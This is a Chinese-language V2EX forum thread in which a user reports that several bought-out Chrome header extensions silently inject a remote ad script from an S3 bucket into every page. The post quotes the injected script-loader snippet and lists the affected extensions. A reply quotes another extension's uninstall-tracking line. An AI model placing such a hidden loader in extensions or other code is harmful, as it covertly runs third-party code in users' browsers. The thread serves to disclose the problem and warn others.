关于 Chrome 插件的安全问题

2016-11-01 03:43:17 +08:00
 shiji

今天用 Chrome 分析网络的时候发现了个 403 状态的“ http_headers_1.js ”最近总是看见。 问题是我访问的是自己的网站,里面没有加载任何 js ,就是个百分百的纯文字页。

后来问题查到了 Chrome 扩展上:

https://chrome.google.com/webstore/detail/http-headers/mhbpoeinkhpajikalhfpjjafpfgjnmgk/reviews

这个叫 Http Header 是我经常使用的一个插件

插件里面有这么一句:

(() => {
var s = document.createElement('script');
s.src = '//s3.eu-central-1.amazonaws.com/forton/http_headers_1.js';
document.body.appendChild(s);})();

目前来说我只见到了 403 状态码。 然后当我卸载了它重新安装的时候。发现这句话不见了:

(() => {
    if (!chrome.contextMenus) {
    return void console.log("Chrome contextMenus access failed"); // http_headers_1
}

但是这个注释也蛮有意思。

针对这个 S3 域名加部分路径搜索,发现了这个:

https://www.reddit.com/r/chrome/comments/4uawrf/fyi_tab_manager_extensions_new_owners_have_added/

https://www.reddit.com/r/help/comments/4tquap/hitting_collapse_comment_icon_button_is/

插入的 js 路径:

https://s3.eu-central-1.amazonaws.com/forton/tab_manager.js

只是文件名不一样了。而且这个 js 是可访问的,不会 403 。说简单点功能就是插广告,引流返利之类的东西。

这些插件作者不同,但是都是近期被别的公司买了。

我觉得 Chrome 应该可以设置禁止插件自动更新,尤其是插件发生了权限变更的时候,谷歌提示要么更新要么删除,有点变态。

更多类似感染的插件:

Live HTTP Headers:

https://chrome.google.com/webstore/detail/live-http-headers/iaiioopjkcekapmldfgbebdclcnpgnlo/reviews?hl=en-US

HTTP Headers:

https://chrome.google.com/webstore/detail/http-headers/mhbpoeinkhpajikalhfpjjafpfgjnmgk/reviews

Tab Manage:

https://chrome.google.com/webstore/detail/tab-manager/coonecdghnepgiblpccbbihiahajndda/reviews?hl=en&gl=US

以上几个估计背后的人是一伙的。

还有这个,我很早就发现问题了,安装的时候会偷偷下载另外一个扩展安装上:

Change HTTP Request Header

https://chrome.google.com/webstore/detail/change-http-request-heade/ppmibgfeefcglejjlpeihfdimbkfbbnm/reviews?hl=en-US

4981 次点击
所在节点    分享发现
8 条回复
onionnews
2016-11-01 08:22:15 +08:00
现在就用一些必要的扩展,其余都删了
redsonic
2016-11-01 08:34:47 +08:00
google 是不是不允许插件代码混淆,如果是我就混淆一下,既然已经耍流氓了。
honeycomb
2016-11-01 08:37:03 +08:00
Google 自己写了一个扩展可以用来监控所有扩展的动作
shiji
2016-11-01 09:25:31 +08:00
@honeycomb 我刚刚找了找,没找到。求名字
idler
2016-11-01 09:35:44 +08:00
AlphaTr
2016-11-01 10:01:19 +08:00
除了大厂的差价,剩下的插件自己写
danliuwo
2016-11-01 21:08:32 +08:00
词霸快译 表示不服,在没有安装任何它的插件它也能搞 chrome, 我在收藏夹打开链接它会先弹出一个新窗口广告,你说屌不屌,别以为不安装插件就安全了
ctsed
2016-11-15 21:34:54 +08:00
还有这个

Inject jQuery 1.0.4
Injects jQuery in the page.
ID : indebdooekgjhkncmgbkeopjebofdoid

chrome.runtime.setUninstallURL('http://extsgo.com/api/tracker/uninstall?ext_id=' + chrome.runtime.id);

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/316952

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX